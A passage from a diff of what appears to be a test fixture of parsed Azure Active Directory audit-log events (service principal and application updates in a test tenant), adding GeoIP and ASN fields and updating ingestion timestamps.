principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13045,6 +13861,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -13218,7 +14046,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125238800Z", + "ingested": "2021-12-14T14:48:43.176726461Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\
"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n 
\\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13245,6 +14073,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -13418,7 +14258,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125243700Z", + "ingested": "2021-12-14T14:48:43.176727084Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\
"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n 
\\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13445,6 +14285,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -13580,7 +14432,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125248800Z", + "ingested": "2021-12-14T14:48:43.176727646Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826392\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc\",\"ModifiedProperties\":[],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -13607,6 +14459,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -13751,7 +14615,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125255600Z", + "ingested": "2021-12-14T14:48:43.176728274Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management 
\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13778,6 +14642,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -13922,7 +14798,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125262400Z", + "ingested": "2021-12-14T14:48:43.176728831Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
